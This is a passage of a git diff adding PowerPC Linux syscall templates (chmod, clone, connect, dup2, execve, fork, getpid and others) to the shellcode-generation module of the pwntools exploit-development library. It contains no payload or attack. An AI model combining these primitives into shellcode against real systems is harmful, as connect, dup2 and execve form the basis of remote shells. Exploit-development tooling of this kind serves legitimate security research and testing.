+++ b/pwnlib/shellcraft/templates/powerpc/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chown.asm b/pwnlib/shellcraft/templates/powerpc/linux/chown.asm new file mode 100644 index 000000000..e3b59f4c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm b/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm new file mode 100644 index 000000000..88be20c79 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm new file mode 100644 index 000000000..08a284e70 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm new file mode 100644 index 000000000..5a76c6ddb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm new file mode 100644 index 000000000..c343e947a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm b/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm new file mode 100644 index 000000000..e9abd6ff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/clone.asm b/pwnlib/shellcraft/templates/powerpc/linux/clone.asm new file mode 100644 index 000000000..06eaafbeb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/close.asm b/pwnlib/shellcraft/templates/powerpc/linux/close.asm new file mode 100644 index 000000000..3cc5843e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/connect.asm b/pwnlib/shellcraft/templates/powerpc/linux/connect.asm new file mode 100644 index 000000000..c2f746be7 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/connect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall connect. See 'man 2 connect' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_connect', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/creat.asm b/pwnlib/shellcraft/templates/powerpc/linux/creat.asm new file mode 100644 index 000000000..88d0373b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/creat.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup.asm new file mode 100644 index 000000000..5e28fada8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall dup. See 'man 2 dup' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_dup', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm new file mode 100644 index 000000000..7fef7cc41 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm b/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm new file mode 100644 index 000000000..5be40ffbf --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm new file mode 100644 index 000000000..6facc0919 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm new file mode 100644 index 000000000..bf9f39752 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm new file mode 100644 index 000000000..fe7665380 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm new file mode 100644 index 000000000..7eb416845 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_pwait.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm new file mode 100644 index 000000000..d6ec67fd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/execve.asm b/pwnlib/shellcraft/templates/powerpc/linux/execve.asm new file mode 100644 index 000000000..21020a79b --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/execve.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path, argv, envp"/> +<%docstring> +Invokes the syscall execve. See 'man 2 execve' for more information. + +Arguments: + path(char): path + argv(char): argv + envp(char): envp + + + ${syscall('SYS_execve', path, argv, envp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/exit.asm b/pwnlib/shellcraft/templates/powerpc/linux/exit.asm new file mode 100644 index 000000000..41e4964b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/exit.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm b/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm new file mode 100644 index 000000000..14e420329 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm b/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm new file mode 100644 index 000000000..54b8f702d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm new file mode 100644 index 000000000..39e95f6f7 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm new file mode 100644 index 000000000..6d1b0bd96 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm new file mode 100644 index 000000000..bfd1fcbf8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm new file mode 100644 index 000000000..588f4eb01 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm new file mode 100644 index 000000000..4eab7f6d0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fchownat.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm b/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm new file mode 100644 index 000000000..836f6cbcb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm b/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm new file mode 100644 index 000000000..fe95268d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/flock.asm b/pwnlib/shellcraft/templates/powerpc/linux/flock.asm new file mode 100644 index 000000000..c7bdc1035 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fork.asm b/pwnlib/shellcraft/templates/powerpc/linux/fork.asm new file mode 100644 index 000000000..058c9e90a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm new file mode 100644 index 000000000..08c294df8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm new file mode 100644 index 000000000..44178d745 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm new file mode 100644 index 000000000..81e167a8f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fstatat64.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm b/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm new file mode 100644 index 000000000..d5326007e --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm new file mode 100644 index 000000000..1e90e958f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm new file mode 100644 index 000000000..2bf43a237 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm b/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm new file mode 100644 index 000000000..761897318 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm b/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm new file mode 100644 index 000000000..2dcd14023 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm new file mode 100644 index 000000000..6b0cfe4e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm new file mode 100644 index 000000000..f293d2f6c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/geteuid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm new file mode 100644 index 000000000..2fffcb624 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm b/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm new file mode 100644 index 000000000..0206522d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm b/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm new file mode 100644 index 000000000..84859a160 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm new file mode 100644 index 000000000..8970db91d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm new file mode 100644 index 000000000..0a484fde6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm new file mode 100644 index 000000000..d8dbe268a --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm new file mode 100644 index 000000000..7980500eb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm new file mode 100644 index 000000000..8fdbd8e87 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm new file mode 100644 index 000000000..4d6809d68 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm b/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm new file mode 100644 index 000000000..ee7f0e2e5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} 
